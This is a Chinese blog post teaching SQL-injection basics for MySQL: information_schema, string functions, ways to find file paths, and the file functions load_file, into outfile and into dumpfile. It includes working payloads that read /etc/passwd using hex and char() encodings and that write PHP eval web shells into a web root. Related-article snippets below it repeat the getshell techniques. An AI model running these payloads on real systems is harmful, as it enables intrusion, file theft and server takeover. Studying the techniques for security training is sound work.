sql注入基础知识储备

最新推荐文章于 2024-04-15 18:32:18 发布
最新推荐文章于 2024-04-15 18:32:18 发布
阅读量141 收藏 2
点赞数
分类专栏: sql注入 文章标签: 安全 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiaohuadehuli/article/details/121606218
版权

information_schema:

information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式

什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。

数据库中的符号"." 代表下一级 例如 xiaodi.user表示数据库xiaodi下的user表名

information_schema.tables   记录所有表名信息的表

information_schema.columns  记录所有列名信息的表

table_name   表名

column_name  列名

数据库注入常用函数:

1.字符串连接函数:

concat() 将多个字符串连接成一个字符串 如有任何一个参数为NULL ,则返回值为 NULL。或许有一个或多个参数。 如果所有参数均为非二进制字符串,则结果为非二进制字符串。 如果自变量中含有任一二进制字符串,则结果为一个二进制字符串。一个数字参数被转化为与之相等的二进制字符串格式;

concat_ws() CONCAT_WS() 代表 CONCAT With Separator ,是CONCAT()的特殊形式。 第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。如果分隔符为 NULL,则结果为 NULL。函数会忽略任何分隔符参数后的 NULL 值。

group_concat() group_concat( [DISTINCT] 要连接的字段 [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] )查询结果默认长度1024字节

2.字符截取函数

substring(string,position,length)

  • string参数是要提取子字符串的字符串。
  • position参数是一个整数,用于指定子串的起始字符,position可以是正或负整数 从1开始
  • length 截取长度

mid()

left( Str, index)

  • Str–表示待截取的字符串
  • index–表示从左边开始共截取多少位

right( Str, index)

  • 用法和 LEFT( ) 函数类似,只不过是从右边开始截取 index 位
  • 如果我们想要截取中间的某几位,我们可以使用 LEFT( ) 和 RIGHT( ) 的组合
MySQL注入之文件读写操作

文件路径获取方法:

  • 报错显示: 一般网站出现错误的时候它会泄露出路径 即报错注入 输入一些 代码使网站访问报错

  • 遗留文件 :站长为了调试信息的时候遗留的文件而泄露的路径。用扫描工具可以扫出 例如phpinfo

  • 漏洞报错 : 知道对方是用什么程序搭建再去网上去搜索漏洞信息:phpcms 爆路径

  • 平台配置文件 :通过读取文件来读取搭建网站平台的配置文件。缺点:路径不是默认的,一旦更改很难找到路径

  • 爆破

报错注入的原理

MYSql内置函数:

在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个

  • into dumpfile()
  • into outfile()
  • load_file()
load_file函数
union select 1,load_file(“c:/inetpub/wwwroot/index.php”),3

into outfile函数
union select 1,"<?php @eval($_GET[x]);?>",3,4,5 into outfile 'C:/Inetpub/wwwroot/cc.php'

into dumpfile 函数 
http://10.1.8.8/sql1/Less-1/?id=-1′ union select 1,”<?php eval($_POST[‘m’]);?>”,3   into dumpfile “C:\\phpStudy\\WWW\\ceshi2.php” –+

load _file()函数
1、必须有权限读取并且文件必须完全可读
2、欲读取文件必须在服务器上
3、必须指定文件完整的路径
4、欲读取文件必须小于max_allowed_packet
secure_file_priv的值为NULL时,表示限制mysqld 不允许导入|导出
secure_file_priv的值为空时,表示不对mysqld的导入|导出做限制
如果存在以上条件,还可以注入,那么就可以用load_file()读文件
对于magic_quotes_gpc=on的时候,会过滤引号
可以通过char,16进制等方式来绕过
例如:
·union select 1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100))–+
·union select 1,2,load_file(0x2f6574632f706173737764)–+

函数集合在这里插入图片描述

在这里插入图片描述

月光狸
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
asp.net知识库
06-18
最详细的SQL注入相关的命令整理 Oracle Oracle中PL/SQL单行函数和组函数详解 mssql+oracle Oracle编程的编码规范及命名规则 Oracle数据库字典介绍 0RACLE的字段类型 事务 CMT DEMO(容器管理事务演示) 事务隔离性的...
mysql查询表中的列名
Lamking 、 Blog
04-22 1642
select column_name from information_schema.COLUMNS where table_name='表名'; 引用:information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。
mysql 判断数据库或表是否存在及如果存在数据库或表则删除
陈词_CC的博客
12-01 6236
查看数据库是否存在(支持模糊查询) SELECT * FROM information_schema.SCHEMATA WHERE SCHEMA_NAME = '数据库名'; -- 模糊查询 SELECT * FROM information_schema.SCHEMATA WHERE SCHEMA_NAME = '%数据库名%'; 判断数据表是否存在(支持模糊查询) -- 精确查询 SELECT * FROM information_schema.TABLES W.
sql注入之into outfile语句写入一句话木马_sql的into outfile
最新发布
code8889的博客
04-15 993
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
SQL注入漏洞(2)注入方法2之into outfile注入
weixin_51339377的博客
03-18 850
into outfile/load_file name=-1' union select 1,load_file('C:/a.txt') --+ 读取c盘下的a.txt文件 name=-1' union select 1,load_file('C:/a.txt')into outfile 'C:/phpstudy_pro/WWW/pikachu/vul/sqli/haha.txt' --+ 读取c盘的a.txt内容到自己目录下的haha.txt 这个into outfile不具备创建文件的能力...
mysql注入 outfile_<转>Mysql注入中into outfile和load_file()总结
weixin_39705435的博客
01-19 256
(1)outfile后面不能接0x开头或者char转换以后的路径,只能是单引号路径。这个问题在php注入中更加麻烦,因为会自动将单引号转义成\',那么基本没的玩了。唯一的一种可能就是你使用mysql远程连接,然后直接在mysql中执行命令,就没有查询限制了。当然,你要是找到了phpmyadmin,也可以。(2)load_file,后面的路径可以是单引号、0x、char转换的字符。这而记得路径中的斜...
ASP.NET学生成绩管理系统(可做毕设)
01-12
5. **安全保护**:系统需要有良好的安全性,包括对敏感数据的加密处理、防止SQL注入攻击以及使用HTTPS协议保障数据传输的安全。 6. **异常处理**:当数据库连接出现问题时,系统应具备错误处理机制,提示用户错误...
FDB:FDB 编码测试
07-03
1. **Java基础知识**:首先,对Java的基础语法、类库和面向对象编程原则的理解是必不可少的。这包括类、对象、接口、继承、多态以及异常处理等概念。对于FDB编码测试,开发者需要能够创建健壮的、可扩展的代码结构。...
reservistas-ativos-php:Sistema网站Reservista Ativo
02-11
为保护系统免受攻击,开发者应遵循安全最佳实践,如使用预处理语句防止SQL注入,过滤和转义用户输入以防止XSS(跨站脚本)攻击,以及定期更新依赖库以修补安全漏洞。 **部署与维护** 项目部署通常涉及服务器配置、...
腾讯2012实习生试题(技术运营)
07-03
9. **安全意识**:了解常见的网络安全威胁,如DDoS攻击、SQL注入、XSS攻击等,以及相应的防护措施。 10. **项目管理**:虽然实习期间可能涉及的项目规模较小,但了解敏捷开发流程(如Scrum、Kanban)和基本的项目...
关于MYSQL into outfile注射
Quantum Intelligence
01-03 2056
其实网上已经有很多关于MYSQL注射的文章了~ 不过还是缺乏重点吧~ 要使用  into outfile 把代码写到web目录取得WEBSHELL  首先需要 3大先天条件①知道物理路径(into outfile 物理路径) 这样才能写对目录②能够使用union (也就是说需要MYSQL3以上的版本)③对方没有对’进行过滤(因为outfile 后面的 不可以用其他函数代替
渗透测试-sql注入getshell的几种方式
lza20001103的博客
08-19 910
渗透测试-sql注入getshell的几种方式 文章目录渗透测试-sql注入getshell的几种方式一. into outfile(1)看secure-file-priv参数的值 介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell。 一. into outfile 利用条件 此方法利用的先决条件 web目录具有写权限,能够使用单引号 知道网站绝对路径(根目录,或则是根目录往下的目录都行) secure_file_priv没有具体值(在mysql/m
mysql数据库,表存在则删除,不存在则创建
weixin_46577684的博客
05-12 4442
存在则删除: DROP TABLE IF EXISTS `student` 不存在则创建: CREATE TABLE IF NOT EXISTS `student`
SQL Sever 数据库基础
黎豆子的博客
05-04 428
SQL Sever 数据库基础--使用master数据库 use master go --判断是否已存在student数据库,如果存在就删除掉 if exists (select * from sys.databases where name ='student') drop database student --创建student数据库 create database student go ...
sql server 2008 r2 创建表前,先判断是否存在,如果存在先删除
Happy_Girl2012的专栏
03-11 1065
if  exists(select * from sysobjects where name = 'student' and type = 'U') drop table student; create table student(     id int identity(1,1) primary key not null,     name nvarchar(10) not null,
MySQL基础命令
青笙尽_
11-23 230
#查看mysql版本 Windows中:mysql --version mysql中:select version();   #查看mysql端口号   cmd命令进入mysql后输入show global variables like 'port';   #启动mysql服务器 net start mysql #关闭  net stop mysql    #进入 ...
mysql对表的基本操作
weixin_53854631的博客
03-13 725
mysql表的基本操作 删除操作drop 删除数据库 DROP DATABASE <数据库名>; drop database test; 删除数据表 DROP TABLE <表名>; drop table t_users; 基本表删除数据、表上的索引都删除 表上的视图往往仍然保留,但无法引用 删除基本表时,系统会从数据字典中删去有关该基本表及其索引的描述(标准中没有,认为表建立后就永久存在) show create table t1; 修改基本表alter 修改表
创建表之前判断表是否存在,如果存在则删除已有表
振华
03-08 4147
sqlserver中,创建表之前判断表是否存在,如果存在则删除已有表 ----SQL-Server if exists (select 1 from sysobjects where id = object_id('EMP') and type = 'U') drop table S_Evalu...
CTFSQL注入基础知识
04-03
下面是CTF中SQL注入基础知识: 1. 什么是SQL注入SQL注入是指攻击者通过在应用程序的输入中插入恶意的SQL代码,从而绕过应用程序的验证和过滤机制,进而执行非法的数据库操作。攻击者可以通过SQL注入获取敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值